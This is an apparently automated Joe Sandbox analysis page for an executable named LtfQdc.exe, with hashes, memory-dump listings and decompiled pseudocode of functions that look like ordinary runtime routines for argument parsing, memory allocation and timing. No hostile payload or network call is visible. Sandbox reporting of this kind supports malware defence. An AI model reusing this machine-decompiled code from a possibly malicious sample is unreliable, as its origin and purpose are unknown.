Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c3ea6314a7d5adc64517116dce9ac21552b1a23e3d3ca15fc596f8ba4fb8be
Instruction ID: d6b446ebe5d7313e2fb5f582068de34c9069dddd823c244b4e8cf13ae2efc8a5
Opcode Fuzzy Hash: b6c3ea6314a7d5adc64517116dce9ac21552b1a23e3d3ca15fc596f8ba4fb8be
Instruction Fuzzy Hash: 5091D4756043418FC718CF28C880A6AB7E2FF89320F19866EFA958B391D731ED45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00D0C734 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00D0C734(void* __edx, intOrPtr _a4) {
				signed int _v12;
				void* _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t41;
				intOrPtr* _t42;
				WCHAR* _t46;
				intOrPtr _t51;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t62;
				intOrPtr _t65;

				_t54 = __edx;
				_pop(_t66);
				_t57 = _a4;
				if(_t57 != 0) {
					if(_t57 == 2 || _t57 == 1) {
						GetModuleFileNameW(0, 0xd44250, 0x104);
						 *0xd44a24 = 0xd44250;
						_t46 =  *0xd44a38; // 0x5501c28
						if(_t46 == 0 ||  *_t46 == 0) {
							_t46 = 0xd44250;
						}
						_v12 = 0;
						_v20 = 0;
						_t25 = E00D0C73F(E00D0C8C4(_t46, 0, 0,  &_v12,  &_v20), _v12, _v20, 2); // executed
						_t62 = _t25;
						if(_t62 != 0) {
							E00D0C8C4(_t46, _t62, _t62 + _v12 * 4,  &_v12,  &_v20);
							if(_t57 != 1) {
								_push( &_v16);
								_v16 = 0;
								_t58 = L00D1ABAB(0, _t54, _t57, _t62);
								if(_t58 == 0) {
									_t55 = _v16;
									_t51 = 0;
									_t33 = _t55;
									if( *_t55 != 0) {
										do {
											_t33 = _t33 + 4;
											_t51 = _t51 + 1;
										} while ( *_t33 != 0);
									}
									 *0xd44a28 = _t51;
									_v16 = 0;
									 *0xd44a30 = _t55;
									E00CC29E0(0);
									_t58 = 0;
								} else {
									E00CC29E0(_v16);
								}
								_v16 = 0;
								E00CC29E0(_t62);
								_t36 = _t58;
							} else {
								 *0xd44a30 = _t62;
								 *0xd44a28 = _v12 - 1;
								goto L13;
							}
						} else {
							_t41 = E00D0D2A7();
							_push(0xc);
							_pop(0);
							 *_t41 = 0;
							L13:
							E00CC29E0(0);
							_t36 = 0;
						}
					} else {
						_t42 = E00D0D2A7();
						_t65 = 0x16;
						 *_t42 = _t65;
						E00D1709C();
						_t36 = _t65;
					}
				} else {
					_t36 = 0;
				}
				return _t36;
			}

0x00d0c734
0x00d0c739
0x00d0c797
0x00d0c79c
0x00d0c7a9
0x00d0c7d5
0x00d0c7db
0x00d0c7e1
0x00d0c7e9
0x00d0c7f0
0x00d0c7f0
0x00d0c7f8
0x00d0c7ff
0x00d0c813
0x00d0c818
0x00d0c81f
0x00d0c83e
0x00d0c849
0x00d0c86c
0x00d0c86e
0x00d0c876
0x00d0c87c
0x00d0c888
0x00d0c88b
0x00d0c88d
0x00d0c891
0x00d0c893
0x00d0c893
0x00d0c896
0x00d0c897
0x00d0c893
0x00d0c89c
0x00d0c8a2
0x00d0c8a5
0x00d0c8ab
0x00d0c8b0
0x00d0c87e
0x00d0c881
0x00d0c881
0x00d0c8b4
0x00d0c8b7
0x00d0c8bc
0x00d0c84b
0x00d0c84f
0x00d0c855
0x00000000
0x00d0c85a
0x00d0c821
0x00d0c821
0x00d0c826
0x00d0c828
0x00d0c829
0x00d0c85c
0x00d0c85e
0x00d0c863
0x00d0c863
0x00d0c7b0
0x00d0c7b0
0x00d0c7b7
0x00d0c7b8
0x00d0c7ba
0x00d0c7bf
0x00d0c7bf
0x00d0c79e
0x00d0c79e
0x00d0c79e
0x00d0c8c3

Strings

C:\Users\user\LtfQdc.exe, xrefs: 00D0C7CC, 00D0C7D3, 00D0C7F0, 00D0C805, 00D0C83D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID: C:\Users\user\LtfQdc.exe
API String ID: 0-2382214958
Opcode ID: 2b22135cf5a98e6c60f35ed4a7caddc0ae94d90b1d1af94ac5991837a96da857
Instruction ID: f57b80e1d9a98b1006e192c6bfa34849f6e62531478d4cc7556c2e75dbc7010e
Opcode Fuzzy Hash: 2b22135cf5a98e6c60f35ed4a7caddc0ae94d90b1d1af94ac5991837a96da857
Instruction Fuzzy Hash: 5841E876A10214BFD7219F98DCC2B9E7BB8EB85750F14416AF408A7381D7708D40DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D1570B Relevance: 2.6, APIs: 2, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00D1570B(void* __ecx) {
				intOrPtr _t3;
				signed int _t4;
				signed int _t5;
				signed int _t6;
				signed int _t13;
				signed int _t14;
				long _t21;
				signed int _t23;

				_t21 = GetLastError();
				_t3 =  *0xd40410; // 0x8
				_t27 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					L4:
					_t4 = L00D15E43(__eflags, _t3, 0xffffffff);
					__eflags = _t4;
					if(_t4 != 0) {
						_t5 = E00CC2A60(1, 0x364); // executed
						_t23 = _t5;
						__eflags = _t23;
						if(__eflags != 0) {
							_t6 = L00D15E43(__eflags,  *0xd40410, _t23);
							__eflags = _t6;
							if(_t6 != 0) {
								E00D158CC(_t23, 0xd44a54);
								E00CC29E0(0);
								_t14 = _t23;
							} else {
								_t14 = 0;
								__eflags = 0;
								L00D15E43(0,  *0xd40410, 0);
								_push(_t23);
								goto L10;
							}
						} else {
							_t14 = 0;
							L00D15E43(__eflags,  *0xd40410, 0);
							_push(0);
							L10:
							E00CC29E0();
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t13 = L00D15E04(_t27, _t3);
					if(_t13 == 0) {
						_t3 =  *0xd40410; // 0x8
						goto L4;
					} else {
						_t1 = _t13 + 1; // 0x1
						asm("sbb ebx, ebx");
						_t14 =  ~_t1 & _t13;
					}
				}
				SetLastError(_t21);
				return _t14;
			}

0x00d15715
0x00d15717
0x00d1571c
0x00d1571f
0x00d1573b
0x00d1573e
0x00d15743
0x00d15745
0x00d15753
0x00d15758
0x00d1575c
0x00d1575e
0x00d15778
0x00d1577d
0x00d1577f
0x00d1579e
0x00d157a5
0x00d157ad
0x00d15781
0x00d15781
0x00d15781
0x00d1578a
0x00d1578f
0x00000000
0x00d1578f
0x00d15760
0x00d15760
0x00d15769
0x00d1576e
0x00d15790
0x00d15790
0x00d15795
0x00d15747
0x00d15747
0x00d15747
0x00d15721
0x00d15722
0x00d15729
0x00d15736
0x00000000
0x00d1572b
0x00d1572b
0x00d15730
0x00d15732
0x00d15732
0x00d15729
0x00d157b1
0x00d157bb

APIs

GetLastError.KERNEL32(?,00000008,00D129D4), ref: 00D1570F
SetLastError.KERNEL32(00000000,?,?,?,00CC6157,00000000), ref: 00D157B1

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 09b196049f48dd301a1dc202444703c98ea1069c6a14ff9b2b7e6cab78bd1c0c
Instruction ID: 47349ba0dbdfc240e0a586883de67271329149d0f9a45bfad7b322d4d8dcd2cf
Opcode Fuzzy Hash: 09b196049f48dd301a1dc202444703c98ea1069c6a14ff9b2b7e6cab78bd1c0c
Instruction Fuzzy Hash: 8411E531604B25FFD6516B60FCCBEEB2648DB813B8B240134F624D51E6DEA88D849170

Uniqueness

Uniqueness Score: -1.00%

Function 00CDC220 Relevance: 2.5, APIs: 2, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,?,?,00CC6157,00000000), ref: 00CDC260
VirtualFree.KERNEL32(00000040,?,00004000,?,00CC6157,00000000), ref: 00CDC275

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b40a59ec572ca38edffb3b00e48d411a0f734bab30ca22f9c0b8aebd90b4cf7e
Instruction ID: c9572a4252c74f24ea293123741bad923e47195e09d8104d35dcea1348a238ad
Opcode Fuzzy Hash: b40a59ec572ca38edffb3b00e48d411a0f734bab30ca22f9c0b8aebd90b4cf7e
Instruction Fuzzy Hash: EBF0E5B0648249A7E7100BE5DC49BAB331ED781711F60C127FB19A7780C7B8EC81C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00C9B0C0 Relevance: 1.7, APIs: 1, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_header.LIBCMT ref: 00C9B450

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Init_thread_header
String ID:
API String ID: 3738618077-0
Opcode ID: fbf80d59ac5ebbed506f397ca0ebd34d3765b156eb57972ad022202b0e6f9473
Instruction ID: 1ef5e084f8830c361e7d0bbe345d593803125bb62dc429b97dec89c95a2852f1
Opcode Fuzzy Hash: fbf80d59ac5ebbed506f397ca0ebd34d3765b156eb57972ad022202b0e6f9473
Instruction Fuzzy Hash: C8815DB8900B119FD710DF54F84EA1A7BE5FB16714F000569F51A9B3ABC7B19908CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C9B000 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_header.LIBCMT ref: 00C9B063

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Init_thread_header
String ID:
API String ID: 3738618077-0
Opcode ID: e58708a87671c6322cfffb350222efba43e12373f95498a260da584da856251d
Instruction ID: 8703fd8b7d4235f8d72eeb90023efdc5002858ddca87c0ab3a4e8f5600c4129f
Opcode Fuzzy Hash: e58708a87671c6322cfffb350222efba43e12373f95498a260da584da856251d
Instruction Fuzzy Hash: F911A1B1900744DFDB10DF98E94AB5AB7B1FB05B20F144279F5265B782D375AC04CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C93268 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInstallDetailsPayload.MSEDGE_ELF(?,00C926EE), ref: 00C9326B

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: DetailsInstallPayload
String ID:
API String ID: 3030567736-0
Opcode ID: 60be4b316d5a273270010fead9b67d214980f6f8aa805f5895436521cfb1173b
Instruction ID: c6a28657f1c94197b36a543d233330ca2504c70aa548e446258631765f3c17a6
Opcode Fuzzy Hash: 60be4b316d5a273270010fead9b67d214980f6f8aa805f5895436521cfb1173b
Instruction Fuzzy Hash: 6CB012F3C0134847844033E67C0AA06361C04001357480062F70E81212AD15B16445B2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CC9A50 Relevance: 16.6, APIs: 11, Instructions: 127
threadCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00CC9A50(long long __fp0) {
				void* _v16;
				struct %anon52 _v28;
				union _LARGE_INTEGER _v32;
				long long _v40;
				long long _v56;
				long long _v64;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t32;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				union _LARGE_INTEGER* _t49;
				signed int _t52;
				signed int _t54;
				intOrPtr _t58;
				intOrPtr _t59;
				long _t60;
				signed int _t64;
				signed int _t65;
				void* _t67;
				int _t71;
				long long _t76;

				_t76 = __fp0;
				_t67 = (_t65 & 0xfffffff8) - 0x48;
				_t31 =  *0xd40014; // 0xfbddd969
				_t32 = _t31 ^ _t64;
				_t71 = _t32;
				_v28.HighPart = _t32;
				asm("movsd xmm1, [0xd51308]");
				asm("xorpd xmm0, xmm0");
				asm("ucomisd xmm1, xmm0");
				if(_t71 == 0 && _t71 == 0) {
					_v76 = GetThreadPriority(GetCurrentThread());
					SetThreadPriority(GetCurrentThread(), 2);
					_t38 =  *0xd51318; // 0x0
					_t52 =  *0xd43e38; // 0x0
					_t59 =  *[fs:0x2c];
					if(_t38 >  *((intOrPtr*)( *((intOrPtr*)(_t59 + _t52 * 4)) + 4))) {
						_t39 = L00CFDC67(_t38, 0xd51318);
						_t67 = _t67 + 4;
						if( *0xd51318 == 0xffffffff) {
							asm("rdtsc");
							 *0xd51310 = _t39;
							 *0xd51314 = _t59;
							L00CFDCDD(0xd51318);
							_t67 = _t67 + 4;
						}
					}
					_t40 =  *0xd51328; // 0x0
					_t54 =  *0xd43e38; // 0x0
					_t58 =  *[fs:0x2c];
					if(_t40 >  *((intOrPtr*)( *((intOrPtr*)(_t58 + _t54 * 4)) + 4))) {
						_t40 = L00CFDC67(_t40, 0xd51328);
						if( *0xd51328 == 0xffffffff) {
							_v28.LowPart = 0;
							_v32.LowPart = 0;
							QueryPerformanceCounter( &_v32);
							 *0xd51324 = _v28.LowPart;
							0xd51320->LowPart = _v32.LowPart;
							_t40 = L00CFDCDD(0xd51328);
						}
					}
					asm("rdtsc");
					_v80 = _t40;
					_v84 = _t58;
					_v28.LowPart = 0;
					_v32.LowPart = 0;
					_t49 =  &_v32;
					QueryPerformanceCounter(_t49);
					_t60 = _v28.LowPart;
					SetThreadPriority(GetCurrentThread(), _v76);
					_v28 = 0;
					_v32.LowPart = 0;
					_t32 = QueryPerformanceFrequency(_t49);
					_t61 = _v32.LowPart - 0xd51320->LowPart;
					asm("sbb edi, [0xd51324]");
					asm("movd xmm0, edi");
					asm("movd xmm1, esi");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x28], xmm1");
					asm("fild qword [esp+0x28]");
					_v56 = _t76;
					asm("movsd xmm0, [esp+0x20]");
					asm("fild qword [esp+0x38]");
					_v40 = _t76;
					asm("divsd xmm0, [esp+0x30]");
					asm("pxor xmm1, xmm1");
					asm("movsd xmm2, [0xd35ed8]");
					asm("ucomisd xmm2, xmm0");
					if(_v32.LowPart - 0xd51320->LowPart <= 0) {
						_t32 = _v80 -  *0xd51310;
						asm("sbb ecx, [0xd51314]");
						asm("movd xmm1, ecx");
						asm("movd xmm2, eax");
						asm("punpckldq xmm2, xmm1");
						asm("punpckldq xmm2, [0xd35eb0]");
						asm("subpd xmm2, [0xd35ec0]");
						asm("movapd xmm1, xmm2");
						asm("unpckhpd xmm1, xmm2");
						asm("addsd xmm1, xmm2");
						asm("divsd xmm1, xmm0");
						asm("movsd [0xd51308], xmm1");
					}
				}
				asm("movsd [esp+0x18], xmm1");
				[tword [esp+0xc] = _v64;
				return E00CFE643(_t32, _t49, _v28.HighPart ^ _t64, _t58, _t60, _t61);
			}

0x00cc9a50
0x00cc9a59
0x00cc9a5c
0x00cc9a61
0x00cc9a61
0x00cc9a63
0x00cc9a67
0x00cc9a6f
0x00cc9a73
0x00cc9a77
0x00cc9a92
0x00cc9a9b
0x00cc9aa1
0x00cc9aa6
0x00cc9aac
0x00cc9abc
0x00cc9bf6
0x00cc9bfb
0x00cc9c05
0x00cc9c0b
0x00cc9c0d
0x00cc9c12
0x00cc9c1d
0x00cc9c22
0x00cc9c22
0x00cc9c05
0x00cc9ac2
0x00cc9ac7
0x00cc9acd
0x00cc9add
0x00cc9c2f
0x00cc9c3e
0x00cc9c44
0x00cc9c4c
0x00cc9c59
0x00cc9c67
0x00cc9c6d
0x00cc9c77
0x00cc9c7c
0x00cc9c3e
0x00cc9ae3
0x00cc9ae5
0x00cc9ae9
0x00cc9aed
0x00cc9af5
0x00cc9afd
0x00cc9b02
0x00cc9b0c
0x00cc9b1b
0x00cc9b21
0x00cc9b29
0x00cc9b32
0x00cc9b38
0x00cc9b3e
0x00cc9b44
0x00cc9b48
0x00cc9b4c
0x00cc9b50
0x00cc9b56
0x00cc9b5a
0x00cc9b5e
0x00cc9b64
0x00cc9b68
0x00cc9b6c
0x00cc9b72
0x00cc9b76
0x00cc9b7e
0x00cc9b82
0x00cc9b88
0x00cc9b92
0x00cc9b98
0x00cc9b9c
0x00cc9ba0
0x00cc9ba4
0x00cc9bac
0x00cc9bb4
0x00cc9bb8
0x00cc9bbc
0x00cc9bc0
0x00cc9bc4
0x00cc9bc4
0x00cc9b82
0x00cc9bcc
0x00cc9bd6
0x00cc9bf0

APIs

GetCurrentThread.KERNEL32 ref: 00CC9A89
GetThreadPriority.KERNEL32(00000000), ref: 00CC9A8C
GetCurrentThread.KERNEL32 ref: 00CC9A96
SetThreadPriority.KERNEL32(00000000,00000002), ref: 00CC9A9B
QueryPerformanceCounter.KERNEL32(00000000), ref: 00CC9B02
GetCurrentThread.KERNEL32 ref: 00CC9B10
SetThreadPriority.KERNEL32(00000000,?), ref: 00CC9B1B
QueryPerformanceFrequency.KERNEL32(00000000), ref: 00CC9B32
__Init_thread_header.LIBCMT ref: 00CC9BF6
__Init_thread_header.LIBCMT ref: 00CC9C2F
QueryPerformanceCounter.KERNEL32(00000000), ref: 00CC9C59

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Thread$CurrentPerformancePriorityQuery$CounterInit_thread_header$Frequency
String ID:
API String ID: 3595693039-0
Opcode ID: 3267c3925c4827205293665bb4c3bb8d282a7b1c3c39f00e8a387ac5d97804a0
Instruction ID: 8c26c2d263b8fd401fcbb2bcd6deced86f5b22453b95999dd2a34910cdf5f9b8
Opcode Fuzzy Hash: 3267c3925c4827205293665bb4c3bb8d282a7b1c3c39f00e8a387ac5d97804a0
Instruction Fuzzy Hash: 1351AF75808744DFD300DF38E869B1ABBF4FB86391F408A1EF99692361DB71A544CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CD29D0 Relevance: 16.6, APIs: 7, Strings: 2, Instructions: 811
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E00CD29D0(signed int __ecx, signed int __edx) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				char _v44;
				char _v45;
				char _v48;
				char _v49;
				signed int _v52;
				char _v53;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v100;
				signed int _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t297;
				signed int _t300;
				signed int* _t308;
				intOrPtr _t310;
				signed int _t313;
				signed int _t315;
				signed char _t317;
				char* _t318;
				signed int* _t321;
				intOrPtr _t323;
				signed int _t329;
				signed int _t331;
				signed char _t333;
				signed int _t334;
				void* _t335;
				signed int _t340;
				signed int _t343;
				signed int _t345;
				signed int _t349;
				signed int _t351;
				unsigned int _t352;
				signed int _t361;
				signed int _t364;
				signed short _t366;
				signed int _t367;
				signed int _t371;
				signed int _t373;
				signed int _t382;
				signed int _t384;
				signed int _t390;
				signed int _t392;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed char _t398;
				signed int _t401;
				intOrPtr _t410;
				signed int* _t420;
				signed int _t426;
				intOrPtr _t433;
				unsigned int _t435;
				signed int* _t443;
				signed int _t444;
				signed int _t445;
				signed int _t450;
				signed int _t456;
				signed int _t457;
				signed int _t460;
				signed int _t470;
				signed int _t475;
				signed int _t477;
				signed char _t484;
				signed int _t489;
				signed int _t490;
				signed int _t492;
				signed int _t497;
				signed int _t502;
				signed int _t506;
				signed int _t512;
				signed char _t513;
				signed int _t515;
				signed char _t516;
				signed int _t519;
				signed int _t531;
				signed int _t558;
				signed int _t559;
				signed int _t565;
				signed int _t566;
				signed char _t569;
				signed char _t570;
				signed int _t572;
				char* _t573;
				intOrPtr* _t574;
				signed int _t575;
				intOrPtr* _t579;
				signed char _t580;
				signed int _t581;
				signed int _t585;
				signed int _t589;
				signed int _t590;
				signed int _t602;
				signed int _t603;
				void* _t605;
				void* _t628;
				void* _t639;

				_t518 = __edx;
				_t397 = __ecx;
				_t605 = (_t603 & 0xfffffff0) - 0x50;
				_t565 = __edx;
				_t383 = __ecx;
				_t297 =  *0xd40014; // 0xfbddd969
				_v24 = _t297 ^ _t602;
				if(__ecx > 8) {
					_t585 =  *0xd52a40; // 0x0
					__eflags = _t585;
					if(_t585 == 0) {
						_t585 = E00CD43A0(__ecx, __edx);
					}
					_t300 = _t383 - 1;
					_v68 = _t300;
					__eflags = _t383 & _t300;
					_t301 = _t300 & 0xffffff00 | (_t383 & _t300) == 0x00000000;
					__eflags = _t383;
					_t398 = _t397 & 0xffffff00 | _t383 != 0x00000000;
					__eflags = _t398 & _t301;
					if((_t398 & _t301) == 0) {
						L160:
						asm("int3");
						asm("ud2");
						goto L161;
					} else {
						__eflags = _t383 - 0x100001;
						if(_t383 >= 0x100001) {
							L161:
							asm("int3");
							asm("ud2");
							L162:
							asm("int3");
							asm("ud2");
							L163:
							asm("int3");
							asm("ud2");
							L164:
							__imp__ReleaseSRWLockExclusive(_t565);
							_t566 = 0;
							L91:
							E00CFE643(_t301, _t383, _v28 ^ _t602, _t518, _t566, _t585);
							return _t566;
						}
						__eflags = _t565;
						if(_t565 == 0) {
							_t401 = 1;
						} else {
							_t401 = _t565;
						}
						_t301 =  *(_t585 + 0xc);
						__eflags = _t383 - 0x4000;
						if(_t383 <= 0x4000) {
							_t402 = _t401 + _t301;
							_t519 = _t383;
							__eflags = _t402 - _t383;
							if(_t402 >= _t383) {
								_t515 = _t402 - 1;
								__eflags = _t515;
								if(_t515 == 0) {
									_t516 = 0x20;
								} else {
									asm("bsr ecx, ecx");
									_t516 = _t515 ^ 0x0000001f;
								}
								_t402 =  ~_t516;
								_t519 = 1 <<  ~_t516;
								__eflags = 1;
							}
							_t518 = _t519 - _t301;
							__eflags = _t518 - _t565;
							if(__eflags < 0) {
								_push(_t565);
								L00CE5A50(_t301, _t402, _t518, __eflags, _t639);
								goto L150;
							}
							goto L30;
						} else {
							_t518 = _t565;
							L30:
							__eflags = _t383 - 0x4001;
							_t565 =  >=  ? _t383 : 0x4000;
							__eflags = _t518;
							if(_t518 == 0) {
								_t384 = 1;
							} else {
								_t384 = _t518;
							}
							_t383 = _t384 + _t301;
